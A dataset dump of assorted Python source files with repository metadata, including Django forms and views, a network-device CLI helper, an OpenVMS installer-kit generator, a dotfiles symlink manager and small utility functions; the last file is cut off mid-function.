Dataset schema (one row per source file; column: type and observed min..max):
hexsha: stringlengths 40..40
size: int64 5..2.06M
ext: stringclasses 10 values
lang: stringclasses 1 value
max_stars_repo_path: stringlengths 3..248
max_stars_repo_name: stringlengths 5..125
max_stars_repo_head_hexsha: stringlengths 40..78
max_stars_repo_licenses: listlengths 1..10
max_stars_count: int64 1..191k, nullable
max_stars_repo_stars_event_min_datetime: stringlengths 24..24, nullable
max_stars_repo_stars_event_max_datetime: stringlengths 24..24, nullable
max_issues_repo_path: stringlengths 3..248
max_issues_repo_name: stringlengths 5..125
max_issues_repo_head_hexsha: stringlengths 40..78
max_issues_repo_licenses: listlengths 1..10
max_issues_count: int64 1..67k, nullable
max_issues_repo_issues_event_min_datetime: stringlengths 24..24, nullable
max_issues_repo_issues_event_max_datetime: stringlengths 24..24, nullable
max_forks_repo_path: stringlengths 3..248
max_forks_repo_name: stringlengths 5..125
max_forks_repo_head_hexsha: stringlengths 40..78
max_forks_repo_licenses: listlengths 1..10
max_forks_count: int64 1..105k, nullable
max_forks_repo_forks_event_min_datetime: stringlengths 24..24, nullable
max_forks_repo_forks_event_max_datetime: stringlengths 24..24, nullable
content: stringlengths 5..2.06M
avg_line_length: float64 1..1.02M
max_line_length: int64 3..1.03M
alphanum_fraction: float64 0..1
count_classes: int64 0..1.6M
score_classes: float64 0..1
count_generators: int64 0..651k
score_generators: float64 0..1
count_decorators: int64 0..990k
score_decorators: float64 0..1
count_async_functions: int64 0..235k
score_async_functions: float64 0..1
count_documentation: int64 0..1.04M
score_documentation: float64 0..1
hexsha: c054e5df6525caa1e5b886eedf24790796e7312b | size: 862 | ext: py | lang: Python
max_stars: WEEKS/CD_Sata-Structures/_RESOURCES/CODESIGNAL/first_duplicate.py @ webdevhub42/Lambda (head b04b84fb5b82fe7c8b12680149e25ae0d27a0960) | licenses: ["MIT"] | count: null | dates: null
max_issues: WEEKS/CD_Sata-Structures/_RESOURCES/CODESIGNAL/first_duplicate.py @ webdevhub42/Lambda (head b04b84fb5b82fe7c8b12680149e25ae0d27a0960) | licenses: ["MIT"] | count: null | dates: null
max_forks: WEEKS/CD_Sata-Structures/_RESOURCES/CODESIGNAL/first_duplicate.py @ webdevhub42/Lambda (head b04b84fb5b82fe7c8b12680149e25ae0d27a0960) | licenses: ["MIT"] | count: null | dates: null
content:
def firstDuplicate(a):
number_frequencies, number_indices, duplicate_index = {}, {}, {}
    # Iterate through the list and increment the frequency count
    # if the number is not yet in the dict. Also note the index associated
    # with the value.
for i in range(len(a)):
if a[i] not in number_frequencies:
number_frequencies[a[i]] = 1
number_indices[a[i]] = i
        elif number_frequencies[a[i]] < 2:
            number_frequencies[a[i]] += 1
            number_indices[a[i]] = i
for number in number_frequencies:
if number_frequencies[number] == 2:
duplicate_index[number] = number_indices[number]
if not duplicate_index:
return -1
else:
minimal_index_key = min(duplicate_index, key=duplicate_index.get)
return minimal_index_key
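# A minimal usage sketch (hypothetical inputs): the function returns the value
# whose second occurrence appears earliest in the list, or -1 if there is no
# duplicate.
# firstDuplicate([2, 1, 3, 5, 3, 2])  # -> 3 (the second 3 precedes the second 2)
# firstDuplicate([1, 2, 3])           # -> -1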
avg_line_length: 34.48 | max_line_length: 73 | alphanum_fraction: 0.62413
classes: 0 (score 0) | generators: 0 (score 0) | decorators: 0 (score 0) | async_functions: 0 (score 0) | documentation: 124 (score 0.143852)

hexsha: c0556573b1b396000e337b73f3de0c54b4d2d005 | size: 374 | ext: py | lang: Python
max_stars: src/viewer/abs/forms.py @ ozacas/asxtrade (head a3645ae526bfc7a546fdf2a39520feda99e3390a) | licenses: ["Apache-2.0"] | count: 8 | dates: 2021-03-20T13:12:25.000Z .. 2022-02-07T11:17:40.000Z
max_issues: src/viewer/abs/forms.py @ ozacas/asxtrade (head a3645ae526bfc7a546fdf2a39520feda99e3390a) | licenses: ["Apache-2.0"] | count: 8 | dates: 2021-03-07T03:23:46.000Z .. 2021-06-01T10:49:56.000Z
max_forks: src/viewer/abs/forms.py @ ozacas/asxtrade (head a3645ae526bfc7a546fdf2a39520feda99e3390a) | licenses: ["Apache-2.0"] | count: 3 | dates: 2020-12-08T10:22:23.000Z .. 2021-08-04T01:59:24.000Z
content:
from django import forms
from django.core.exceptions import ValidationError
from abs.models import dataflows
class ABSDataflowForm(forms.Form):
dataflow = forms.ChoiceField(choices=(), required=True)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.fields["dataflow"].choices = [(i.abs_id, i.name) for i in dataflows()]
avg_line_length: 31.166667 | max_line_length: 83 | alphanum_fraction: 0.71123
classes: 262 (score 0.700535) | generators: 0 (score 0) | decorators: 0 (score 0) | async_functions: 0 (score 0) | documentation: 10 (score 0.026738)

hexsha: c058a47a9fcf9cced343a8955317d5594bcf17a7 | size: 734 | ext: py | lang: Python
max_stars: pkgs/sdk-pkg/src/genie/libs/sdk/apis/iosxe/dot1x/clear.py @ patrickboertje/genielibs (head 61c37aacf3dd0f499944555e4ff940f92f53dacb) | licenses: ["Apache-2.0"] | count: 1 | dates: 2022-01-16T10:00:24.000Z .. 2022-01-16T10:00:24.000Z
max_issues: pkgs/sdk-pkg/src/genie/libs/sdk/apis/iosxe/dot1x/clear.py @ patrickboertje/genielibs (head 61c37aacf3dd0f499944555e4ff940f92f53dacb) | licenses: ["Apache-2.0"] | count: null | dates: null
max_forks: pkgs/sdk-pkg/src/genie/libs/sdk/apis/iosxe/dot1x/clear.py @ patrickboertje/genielibs (head 61c37aacf3dd0f499944555e4ff940f92f53dacb) | licenses: ["Apache-2.0"] | count: null | dates: null
content:
# Python
import logging
# Unicon
from unicon.core.errors import SubCommandFailure
# Logger
log = logging.getLogger(__name__)
def clear_access_session_intf(device, intf):
""" clear access-session interface {}
Args:
device (`obj`): Device object
intf('str'): Name of the interface to clear access-session
Returns:
None
Raises:
SubCommandFailure
"""
try:
device.execute('clear access-session interface {intf}'.format(intf=intf))
except SubCommandFailure as e:
raise SubCommandFailure(
"Could not clear access-session interface on {device}. Error:\n{error}"
.format(device=device, error=e)
)
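# A hedged usage sketch: `device` is assumed to be a connected pyATS/Unicon
# device object, and the interface name below is illustrative.
# clear_access_session_intf(device, 'GigabitEthernet1/0/1')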
avg_line_length: 24.466667 | max_line_length: 83 | alphanum_fraction: 0.622616
classes: 0 (score 0) | generators: 0 (score 0) | decorators: 0 (score 0) | async_functions: 0 (score 0) | documentation: 386 (score 0.525886)

hexsha: c059b518fc62b90809941f99c3bd5f94aa341ed5 | size: 9,713 | ext: py | lang: Python
max_stars: pipeline/forms.py @ jnis77diver/django-pipeline (head 8bac57adae84615d9d79ad19b2b591c2e46879f9) | licenses: ["MIT"] | count: null | dates: null
max_issues: pipeline/forms.py @ jnis77diver/django-pipeline (head 8bac57adae84615d9d79ad19b2b591c2e46879f9) | licenses: ["MIT"] | count: 1 | dates: 2021-09-20T22:02:21.000Z .. 2021-09-21T13:55:41.000Z
max_forks: pipeline/forms.py @ jnis77diver/django-pipeline (head 8bac57adae84615d9d79ad19b2b591c2e46879f9) | licenses: ["MIT"] | count: 1 | dates: 2021-09-18T01:39:48.000Z .. 2021-09-18T01:39:48.000Z
content:
"""Support for referencing Pipeline packages in forms and widgets."""
from __future__ import unicode_literals
from django.contrib.staticfiles.storage import staticfiles_storage
from django.utils.functional import cached_property
try:
from django.utils.six import iteritems, add_metaclass
except ImportError:
from .decorator import add_metaclass
def iteritems(dictionary):
return dictionary.items()
from .collector import default_collector
from .conf import settings
from .packager import Packager
class PipelineFormMediaProperty(object):
"""A property that converts Pipeline packages to lists of files.
This is used behind the scenes for any Media classes that subclass
:py:class:`PipelineFormMedia`. When accessed, it converts any Pipeline
packages into lists of media files and returns or forwards on lookups to
that list.
"""
def __init__(self, get_media_files_func, media_cls, extra_files):
"""Initialize the property.
Args:
get_media_files_func (callable):
The function to call to generate the media files.
media_cls (type):
The Media class owning the property.
extra_files (object):
Files listed in the original ``css`` or ``js`` attribute on
the Media class.
"""
self._get_media_files_func = get_media_files_func
self._media_cls = media_cls
self._extra_files = extra_files
@cached_property
def _media_files(self):
"""The media files represented by the property."""
return self._get_media_files_func(self._media_cls, self._extra_files)
def __get__(self, *args, **kwargs):
"""Return the media files when accessed as an attribute.
This is called when accessing the attribute directly through the
Media class (for example, ``Media.css``). It returns the media files
directly.
Args:
*args (tuple, unused):
Unused positional arguments.
**kwargs (dict, unused):
Unused keyword arguments.
Returns:
object:
The list or dictionary containing the media files definition.
"""
return self._media_files
def __getattr__(self, attr_name):
"""Return an attribute on the media files definition.
This is called when accessing an attribute that doesn't otherwise
exist in the property's dictionary. The call is forwarded onto the
media files definition.
Args:
attr_name (unicode):
The attribute name.
Returns:
object:
The attribute value.
Raises:
AttributeError:
An attribute with this name could not be found.
"""
return getattr(self._media_files, attr_name)
def __iter__(self):
"""Iterate through the media files definition.
This is called when attempting to iterate over this property. It
iterates over the media files definition instead.
Yields:
object:
Each entry in the media files definition.
"""
return iter(self._media_files)
class PipelineFormMediaMetaClass(type):
"""Metaclass for the PipelineFormMedia class.
This is responsible for converting CSS/JavaScript packages defined in
Pipeline into lists of files to include on a page. It handles access to the
:py:attr:`css` and :py:attr:`js` attributes on the class, generating a
list of files to return based on the Pipelined packages and individual
files listed in the :py:attr:`css`/:py:attr:`css_packages` or
:py:attr:`js`/:py:attr:`js_packages` attributes.
"""
def __new__(cls, name, bases, attrs):
"""Construct the class.
Args:
name (bytes):
The name of the class.
bases (tuple):
The base classes for the class.
attrs (dict):
The attributes going into the class.
Returns:
type:
The new class.
"""
new_class = super(PipelineFormMediaMetaClass, cls).__new__(
cls, name, bases, attrs)
# If we define any packages, we'll need to use our special
# PipelineFormMediaProperty class. We use this instead of intercepting
# in __getattribute__ because Django does not access them through
# normal property access. Instead, grabs the Media class's __dict__
# and accesses them from there. By using these special properties, we
# can handle direct access (Media.css) and dictionary-based access
# (Media.__dict__['css']).
if 'css_packages' in attrs:
new_class.css = PipelineFormMediaProperty(
cls._get_css_files, new_class, attrs.get('css') or {})
if 'js_packages' in attrs:
new_class.js = PipelineFormMediaProperty(
cls._get_js_files, new_class, attrs.get('js') or [])
return new_class
def _get_css_files(cls, extra_files):
"""Return all CSS files from the Media class.
Args:
extra_files (dict):
The contents of the Media class's original :py:attr:`css`
attribute, if one was provided.
Returns:
dict:
The CSS media types and files to return for the :py:attr:`css`
attribute.
"""
packager = Packager()
css_packages = getattr(cls, 'css_packages', {})
return dict(
(media_target,
cls._get_media_files(packager=packager,
media_packages=media_packages,
media_type='css',
extra_files=extra_files.get(media_target,
[])))
for media_target, media_packages in iteritems(css_packages)
)
def _get_js_files(cls, extra_files):
"""Return all JavaScript files from the Media class.
Args:
extra_files (list):
The contents of the Media class's original :py:attr:`js`
attribute, if one was provided.
Returns:
list:
The JavaScript files to return for the :py:attr:`js` attribute.
"""
return cls._get_media_files(
packager=Packager(),
media_packages=getattr(cls, 'js_packages', {}),
media_type='js',
extra_files=extra_files)
def _get_media_files(cls, packager, media_packages, media_type,
extra_files):
"""Return source or output media files for a list of packages.
This will go through the media files belonging to the provided list
of packages referenced in a Media class and return the output files
(if Pipeline is enabled) or the source files (if not enabled).
Args:
packager (pipeline.packager.Packager):
The packager responsible for media compilation for this type
of package.
media_packages (list of unicode):
The list of media packages referenced in Media to compile or
return.
extra_files (list of unicode):
The list of extra files to include in the result. This would
be the list stored in the Media class's original :py:attr:`css`
or :py:attr:`js` attributes.
Returns:
list:
The list of media files for the given packages.
"""
source_files = list(extra_files)
if (not settings.PIPELINE_ENABLED and
settings.PIPELINE_COLLECTOR_ENABLED):
default_collector.collect()
for media_package in media_packages:
package = packager.package_for(media_type, media_package)
if settings.PIPELINE_ENABLED:
source_files.append(
staticfiles_storage.url(package.output_filename))
else:
source_files += packager.compile(package.paths)
return source_files
@add_metaclass(PipelineFormMediaMetaClass)
class PipelineFormMedia(object):
"""Base class for form or widget Media classes that use Pipeline packages.
Forms or widgets that need custom CSS or JavaScript media on a page can
define a standard :py:class:`Media` class that subclasses this class,
listing the CSS or JavaScript packages in :py:attr:`css_packages` and
:py:attr:`js_packages` attributes. These are formatted the same as the
standard :py:attr:`css` and :py:attr:`js` attributes, but reference
Pipeline package names instead of individual source files.
If Pipeline is enabled, these will expand to the output files for the
packages. Otherwise, these will expand to the list of source files for the
packages.
Subclasses can also continue to define :py:attr:`css` and :py:attr:`js`
attributes, which will be returned along with the other output/source
files.
Example:
from django import forms
from pipeline.forms import PipelineFormMedia
class MyForm(forms.Media):
...
class Media(PipelineFormMedia):
css_packages = {
'all': ('my-form-styles-package',
'other-form-styles-package'),
'print': ('my-form-print-styles-package',),
}
js_packages = ('my-form-scripts-package',)
js = ('some-file.js',)
"""
avg_line_length: 34.81362 | max_line_length: 79 | alphanum_fraction: 0.615258
classes: 9,141 (score 0.94111) | generators: 0 (score 0) | decorators: 1,633 (score 0.168125) | async_functions: 0 (score 0) | documentation: 6,478 (score 0.666941)

hexsha: c05cbafe5128e838bdc6f0435f143a4bec7be43b | size: 1,838 | ext: py | lang: Python
max_stars: api_user/views.py @ archkwon/python-django-restful-mysql (head a8097c08057de9656cb40266420fcffebb11bdb6) | licenses: ["MIT"] | count: null | dates: null
max_issues: api_user/views.py @ archkwon/python-django-restful-mysql (head a8097c08057de9656cb40266420fcffebb11bdb6) | licenses: ["MIT"] | count: null | dates: null
max_forks: api_user/views.py @ archkwon/python-django-restful-mysql (head a8097c08057de9656cb40266420fcffebb11bdb6) | licenses: ["MIT"] | count: null | dates: null
content:
from django.http import QueryDict
from django.http.response import JsonResponse
from rest_framework import viewsets, status
from rest_framework.views import APIView
from .serializers import *
class UserInfoViewSet(viewsets.ModelViewSet):
queryset = UserInfoModel.objects.all()
serializer_class = UserInfoSerializer
def get_queryset(self):
queryset = super().get_queryset()
user_id = self.request.query_params.get('user_id', '')
        if user_id:
            queryset = queryset.filter(user_id=user_id)
return queryset
class UserInfoSessionView(APIView):
# noinspection PyMethodMayBeStatic
def get(self, request, *args, **kwargs):
user_id = request.GET['user_id']
user_model = UserInfoModel.objects.get(user_id=user_id)
serializer = UserInfoSerializer(user_model)
return JsonResponse({
'code': True,
'status': status.HTTP_200_OK,
'response': serializer.data,
'message': 'SEARCH_SUCCESS'}, status=status.HTTP_200_OK)
# Update the login token
class UpdateTokenAction(APIView):
# noinspection PyMethodMayBeStatic
def put(self, request):
put = QueryDict(request.body)
user_id = put.get('user_id')
device_token = put.get('device_token')
if UserInfoModel.objects.filter(user_id=user_id).exists():
user_detail = UserInfoModel.objects.get(user_id=user_id)
user_detail.device_token = device_token
user_detail.save()
return JsonResponse({
'code': True,
'status': status.HTTP_200_OK,
'message': 'UPDATE_SUCCESS'}, status=status.HTTP_200_OK)
return JsonResponse({
'code': False,
'status': status.HTTP_200_OK,
'message': 'FAIL'}, status=status.HTTP_200_OK)
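# A hedged usage sketch (the URL routing is assumed and not shown in this
# file; host and path are illustrative). UpdateTokenAction expects a
# form-encoded PUT body:
#   curl -X PUT http://localhost:8000/users/token/ \
#        -d 'user_id=alice&device_token=abc123'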
avg_line_length: 31.152542 | max_line_length: 72 | alphanum_fraction: 0.650707
classes: 1,624 (score 0.875) | generators: 0 (score 0) | decorators: 0 (score 0) | async_functions: 0 (score 0) | documentation: 259 (score 0.139547)

hexsha: c05d4625afeae008646d224702597baba51c509c | size: 5,043 | ext: py | lang: Python
max_stars: vms/create_kit_files.py @ vmssoftware/python_3_8_2 (head 06cdf3fc9ae103afc55cbd5657ba7c7d09120a81) | licenses: ["CNRI-Python-GPL-Compatible"] | count: 3 | dates: 2020-11-30T22:36:38.000Z .. 2021-01-22T01:00:06.000Z
max_issues: vms/create_kit_files.py @ vmssoftware/python_3_8_2 (head 06cdf3fc9ae103afc55cbd5657ba7c7d09120a81) | licenses: ["CNRI-Python-GPL-Compatible"] | count: null | dates: null
max_forks: vms/create_kit_files.py @ vmssoftware/python_3_8_2 (head 06cdf3fc9ae103afc55cbd5657ba7c7d09120a81) | licenses: ["CNRI-Python-GPL-Compatible"] | count: 1 | dates: 2021-04-13T13:17:02.000Z .. 2021-04-13T13:17:02.000Z
content:
import os
import re
import sys
def spec_replacer(match):
if match.group(0) == ' ':
return '^_'
return '^' + match.group(0)
def create_content(type, major, minor, level, edit):
python_dir = '/python$root'
python_dir_len = len(python_dir)
all_dirs = []
all_files = []
spec_pattern = re.compile('([. ^+()])')
for root, dirs, files in os.walk(python_dir):
inner_dirs = list(filter(lambda x: x != '', spec_pattern.sub(spec_replacer, root[python_dir_len:]).split('/')))
kit_dir = '[' + '.'.join(['python'] + inner_dirs) + ']'
all_dirs.append('directory "' + kit_dir + '" version limit 1;')
for file in files:
file_name, file_ext = os.path.splitext(file)
if file_ext == '':
file_ext = '.'
file_name = spec_pattern.sub(spec_replacer, file_name)
all_files.append('file "' + \
kit_dir + file_name + file_ext + \
'" source "' + \
kit_dir + file_name + file_ext + \
'";')
# try:
# dirs.remove('__pycache__')
# except:
# pass
kit_template = '''--
-- (C) Copyright 2021 VMS Software Inc.
--
product VSI I64VMS PYTHON {type}{major}.{minor}-{level}{edit} FULL ;
--
-- Execute the preconfigure procedure
--
execute preconfigure "@pcsi$source:[python]python$pcsi_preconfigure.com" uses [python]python$pcsi_preconfigure.com ;
--
-- Make sure VMS V8.4 or above is installed
--
if ((not <software VSI I64VMS VMS version minimum V8.4>) and (not <software HP I64VMS VMS version minimum V8.4>)) ;
error NO_MIN_VMS abort ;
end if ;
--
-- ODS-5 Disk(s) should be available on this system
--
if (<logical name PYTHON$ODS5_AVAIL equals 0 table LNM$JOB>) ;
error NO_ODS5_DISKS ;
end if ;
--
-- Directories...
--
{dirs}
--
-- Files...
--
{files}
--
-- Start-up and shutdown scripts
--
file "[sys$startup]python$define_root.com" source "[python]python$define_root.com";
file "[sys$startup]python$startup.com" source "[python]python$startup.com";
file "[sys$startup]python$shutdown.com" source "[python]python$shutdown.com";
--
-- Release notes
--
-- (none)
--
-- Do post-install tasks
--
execute postinstall "@pcsi$source:[python]python$define_root.com" interactive uses "[python]python$define_root.com" ;
--
-- Okay, done. Tell the user what to do next.
--
information POST_INSTALL phase after with helptext;
--
-- All done
--
end product;
'''
# type, major, minor, level, edit must be the same as in pythlib.pcsi$text
kit_content = kit_template.format(
type=type,
major=major,
minor=minor,
level=level,
edit=edit,
dirs='\n '.join(all_dirs),
files='\n '.join(all_files))
with open('python.pcsi$desc', 'w') as file:
file.write(kit_content)
text_template = '''=product VSI I64VMS PYTHON {type}{major}.{minor}-{level}{edit} full
1 'PRODUCT
=prompt Python for OpenVMS is based on Python Version 3.8.2
1 'PRODUCER
=prompt VSI Software Inc.
1 'NOTICE
=prompt (C) Copyright 2021 VMS Software Inc.
1 NO_MIN_VMS
=prompt Minimum OpenVMS software version not found on this system, abort installation
This kit requires a minimum of OpenVMS I64 V8.4.
1 NO_ODS5_DISKS
=prompt ODS-5 disk(s) not found on this system, abort installation
This kit requires an ODS-5 disk to be correctly installed in this system.
1 POST_INSTALL
=prompt Post-installation tasks are required.
To define the Python runtime at system boot time, add the
following lines to SYS$MANAGER:SYSTARTUP_VMS.COM:
$ file := SYS$STARTUP:PYTHON$STARTUP.COM
$ if f$search("''file'") .nes. "" then @'file'
To shutdown the Python runtime at system shutdown time, add the
following lines to SYS$MANAGER:SYSHUTDWN.COM:
$ file := SYS$STARTUP:PYTHON$SHUTDOWN.COM
$ if f$search("''file'") .nes. "" then @'file'
'''
text_content = text_template.format(
type=type,
major=major,
minor=minor,
level=level,
edit=edit,
dirs='\n '.join(all_dirs),
files='\n '.join(all_files))
with open('python.pcsi$text', 'w') as file:
file.write(text_content)
if __name__ == "__main__":
import getopt
import datetime
opts, args = getopt.getopt(sys.argv[1:], '', ['type=', 'major=', 'minor=', 'level=', 'edit='])
type = 'F'
major = '3'
minor = '8'
level = '2'
edit = '' # 'd' + datetime.date.today().strftime('%Y%m%d')
for opt, optarg in opts:
if opt in ['--type']:
type = optarg
elif opt in ['--major']:
major = optarg
elif opt in ['--minor']:
minor = optarg
elif opt in ['--level']:
level = optarg
elif opt in ['--edit']:
edit = optarg
else:
print('Unknown option %s' % opt)
create_content(
type,
major,
minor,
level,
edit,
)
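# A hedged usage sketch based on the getopt options above; this is meant to
# run on the OpenVMS build host where /python$root exists:
#   python create_kit_files.py --type F --major 3 --minor 8 --level 2 --edit ""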
avg_line_length: 26.265625 | max_line_length: 120 | alphanum_fraction: 0.601229
classes: 0 (score 0) | generators: 0 (score 0) | decorators: 0 (score 0) | async_functions: 0 (score 0) | documentation: 2,887 (score 0.572477)

hexsha: c05de0c488b3f0907732a9cffd73ea481b5c0be6 | size: 10,458 | ext: py | lang: Python
max_stars: dotfiles/config/feltnerm/bin/dots.py @ feltnerm/dotfiles (head 0984ade31ecfcd003e1cce4f165fcd717e9b6317) | licenses: ["WTFPL"] | count: 4 | dates: 2016-06-19T20:02:12.000Z .. 2017-02-27T19:55:49.000Z
max_issues: dotfiles/config/feltnerm/bin/dots.py @ feltnerm/dotfiles (head 0984ade31ecfcd003e1cce4f165fcd717e9b6317) | licenses: ["WTFPL"] | count: 6 | dates: 2016-01-20T20:24:42.000Z .. 2016-08-17T02:31:43.000Z
max_forks: dotfiles/config/feltnerm/bin/dots.py @ feltnerm/dotfiles (head 0984ade31ecfcd003e1cce4f165fcd717e9b6317) | licenses: ["WTFPL"] | count: null | dates: null
content:
#!/usr/bin/env python
# dots.py
# @TODO:
# - fix the diffing
# - use rsync across hosts or something fancy
import argparse, difflib, functools, re, shutil, subprocess, sys, time, os
from pprint import pprint
__description__ = "Manage your dotfiles."
ls = lambda path: os.listdir(path)
ls_abs = lambda path: [os.path.join(path, x) for x in os.listdir(path)]
ln = lambda src, dst: os.symlink(src, dst)
unlink = lambda src: os.unlink(src)
def rm(path):
try:
if os.path.isdir(path):
os.rmdir(path)
else:
os.remove(path)
except OSError, e:
print(e)
def diff(fromfile, tofile):
if os.path.exists(tofile):
fromdate = time.ctime(os.stat(fromfile).st_mtime)
todate = time.ctime(os.stat(tofile).st_mtime)
fromlines = open(fromfile, 'U').readlines()
tolines = open(tofile, 'U').readlines()
diff = difflib.unified_diff(fromlines, tolines,
fromfile, tofile, fromdate, todate)
return diff
def parse_args(argv):
DEFAULTS = {
'source_dir': os.path.join(os.getenv("HOME"), "dotfiles"),
'dest_dir': os.path.join(os.getenv("HOME"))
}
ap = argparse.ArgumentParser(prog='dots.py',
description=__description__)
ap.add_argument("-d", "--dest-dir", default=DEFAULTS['dest_dir'],
help="Directory to process source files to.")
ap.add_argument("-e", "--exclude", help="Regex of files to exclude")
ap.add_argument("-f", "--force", help="Force the operation to continue.")
ap.add_argument("-i", "--interactive", default=False, action='store_true',
help="Run interactively.")
ap.add_argument("-l", "--list-commands", default=False, action='store_true',
help="List the possible commands.")
ap.add_argument("-n", "--dry-run", default=False, action='store_true',
help="Dry run.")
ap.add_argument("--no-dot",
help="Comma-separated list of files to not append a '.' to")
ap.add_argument("-s", "--source-dir", default=DEFAULTS['source_dir'],
help="Directory to process source files from.")
ap.add_argument("-v", "--version", default=False, action='store_true',
help="Print the version.")
ap.add_argument("-V", "--verbose", default=False, action='store_true',
help="Verbose mode.")
ap.add_argument("commands", nargs="*", help="Command to run.")
args = ap.parse_args(argv)
return args
def ask(msg):
inp = raw_input(msg + " [Y]/n?").lower()
while inp not in ('y','n'):
inp = raw_input(msg + " [Y]/n?").lower()
if inp == 'y':
return True
else:
return False
#
# dotfiles command API
#
class Dotfiles(object):
def __init__(self, opts):
self.options = {
"exclude": [
r'^\.'
],
"exclude_list": [
'README.md',
'LICENSE',
'dots.py',
],
"nodot_list": ['bin']
}
for key in opts.keys():
if opts.get(key, None):
self.options[key] = (opts.get(key))
# Look for the source and destination directories
self.src = self.options.get('source_dir', None)
self.dst = self.options.get('dest_dir', None)
if not (os.path.isdir(self.src) and os.path.isdir(self.dst)):
raise Exception("BAD PATH: <Source: %s> <Dest: %s>" %
(self.src, self.dst))
# Process files which to not add a '.' to
_nodot = self.options.get('nodot', None)
if _nodot:
if "," in _nodot:
self.options['nodot_list'].extend(_nodot.split(','))
else:
self.options['nodot_list'].append(_nodot)
# Process regex for excluding files
_re_excludes = self.options.get('exclude', None)
if _re_excludes:
for _re_exclude in _re_excludes:
_re_exclude = _re_exclude.decode('string_escape')
re_exclude = re.compile(_re_exclude)
self.options['exclude_list'].extend(filter(lambda x: re_exclude.match(x), ls(self.src)))
#_re_exclude = self.options.get('exclude', None)
#if _re_exclude:
# _re_exclude = _re_exclude.decode('string_escape')
# re_exclude = re.compile(_re_exclude)
# self.options['exclude_list'].extend(filter(lambda x: re_exclude.match(x), ls(self.src)))
# Pre-process (cache) these files for quick access
#self.source_files = self._nodots(self._exclude(ls(self.src))()
self.source_files = self._exclude(ls(self.src))()
self.dest_files = ls(self.dst)
self.verbose = self.options.get('verbose')
self.interactive = self.options.get('interactive')
self.dry_run = self.options.get('dry_run')
if self.options.get('verbose', False):
pprint(self.options)
@property
def commands(self):
return filter(lambda method: method.startswith('cmd_'), dir(self))
def _nodots(self, l):
def map_func(x):
return x.lstrip('.') if x in self.options['nodot_list'] else x
return functools.partial(map, map_func, l)
def _exclude(self, l):
def filter_func(x):
return x not in [os.path.basename(a) for a in self.options['exclude_list']]
return functools.partial(filter, filter_func, l)
def _execute(self, cmd, func):
if self.dry_run:
self.verbose = True
            func = None  # dry run: report the command, never execute it
if self.verbose:
print("# Execute: %s" % cmd)
if func:
func()
def run(self, command):
cmd = 'cmd_' + command
if hasattr(self, cmd):
func = getattr(self, cmd)
if callable(func):
try:
self._execute(cmd, func)
except Exception, e:
print(e)
#
# Commands API
#
def cmd_init(self):
""" Task to initialize dotfiles in your $HOME for the first time. """
print(">> Initing ...")
commands = ['update', 'diff', 'link']
for cmd in commands:
self.run(cmd)
def cmd_diff(self):
""" Show the differences between $DOTFILES and $HOME. """
print(">> Diffing ...")
for from_file in self.source_files:
fromfile = os.path.join(self.options.get('source_dir'), from_file)
if not os.path.isdir(fromfile):
#to_file = os.path.join(self.options.get('dest_dir', from_file))
tofile = os.path.join(self.options.get('dest_dir'), "." + from_file)
sys.stdout.writelines(diff(fromfile, tofile))
def cmd_link(self):
""" Link files in $DOTFILES to corresponding files in $HOME. """
print(">> Linking ...")
for from_file in self.source_files:
fromfile = os.path.join(self.options.get('source_dir'), from_file)
tofile = os.path.join(self.options.get('dest_dir'), "." + from_file)
nodeExists = os.path.lexists(tofile)
if nodeExists:
print("\nFile %s exists already!" % tofile)
if self.options.get('force', False):
if self.interactive:
if ask("Link %s->%s" % (fromfile, tofile)):
if self.verbose:
print("rm(%s)" % (tofile))
print("ln(%s, %s)" % (fromfile, tofile))
if os.path.islink(tofile):
unlink(tofile)
elif os.path.isdir(tofile):
shutil.rmtree(tofile)
ln(fromfile, tofile)
else:
rm(tofile)
ln(fromfile, tofile)
else:
if self.verbose:
print("rm(%s)" % (tofile))
print("ln(%s, %s)" % (fromfile, tofile))
rm(tofile)
ln(fromfile, tofile)
else:
if self.interactive:
if ask("Link %s->%s" % (fromfile, tofile)):
if self.verbose:
print("ln(%s, %s)" % (fromfile, tofile))
ln(fromfile, tofile)
else:
if self.verbose:
print("ln(%s, %s)" % (fromfile, tofile))
ln(fromfile, tofile)
def cmd_clean(self):
""" Clean the dotfiles in $HOME. """
print(">> Cleaning ...")
for from_file in self.source_files:
fromfile = os.path.join(self.options.get('source_dir'), from_file)
tofile = os.path.join(self.options.get('dest_dir'), "." + from_file)
if os.path.lexists(tofile):
if self.verbose:
print("rm(%s)" % tofile)
rm(tofile)
def cmd_update(self):
""" Update dotfiles and dependencies in $HOME with latest
in the repo(s). """
print(">> Updating ...")
cmd = "cd %s; git pull" % self.options.get('source_dir')
output = subprocess.check_output(
cmd,
stderr=subprocess.STDOUT,
shell=True)
print(output)
def cmd_status(self):
""" Status of $DOTFILES. """
print(">> Status: ")
cmd = "cd %s; git status" % self.options.get('source_dir')
output = subprocess.check_output(
cmd,
stderr=subprocess.STDOUT,
shell=True)
print(output)
def run(commands, opts):
df = Dotfiles(opts)
if not opts['commands'] or opts['list_commands']:
for cmd in df.commands:
print(cmd.split("_")[1]+":")
docstring = getattr(getattr(df, cmd), '__doc__')
print(docstring)
else:
for command in commands:
df.run(command)
#
# main
#
def main(argv=None):
args = parse_args(argv)
run(args.commands, vars(args))
return 0 # success
if __name__ == '__main__':
status = main()
sys.exit(status)
avg_line_length: 34.288525 | max_line_length: 104 | alphanum_fraction: 0.52467
classes: 7,188 (score 0.687321) | generators: 0 (score 0) | decorators: 108 (score 0.010327) | async_functions: 0 (score 0) | documentation: 2,450 (score 0.23427)

hexsha: c05e6da89d714cfca87531c2eed521c2ad804f17 | size: 246 | ext: py | lang: Python
max_stars: plot_log_population.py @ catskillsresearch/openasr20 (head b9821c4ee6a51501e81103c1d6d4db0ea8aaa31e) | licenses: ["Apache-2.0"] | count: null | dates: null
max_issues: plot_log_population.py @ catskillsresearch/openasr20 (head b9821c4ee6a51501e81103c1d6d4db0ea8aaa31e) | licenses: ["Apache-2.0"] | count: null | dates: null
max_forks: plot_log_population.py @ catskillsresearch/openasr20 (head b9821c4ee6a51501e81103c1d6d4db0ea8aaa31e) | licenses: ["Apache-2.0"] | count: 1 | dates: 2021-07-28T02:13:21.000Z .. 2021-07-28T02:13:21.000Z
content:
import matplotlib.pylab as plt
def plot_log_population(population, _title, _xlabel, _ylabel, _bins):
plt.hist(population,bins=_bins)
plt.xlabel(_xlabel)
plt.ylabel(_ylabel)
plt.title(_title)
    plt.yscale('log')
plt.show()
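# A minimal usage sketch with synthetic data (all names and values below are
# illustrative, not from the original project):
# import numpy as np
# samples = np.random.lognormal(mean=0.0, sigma=1.0, size=10_000)
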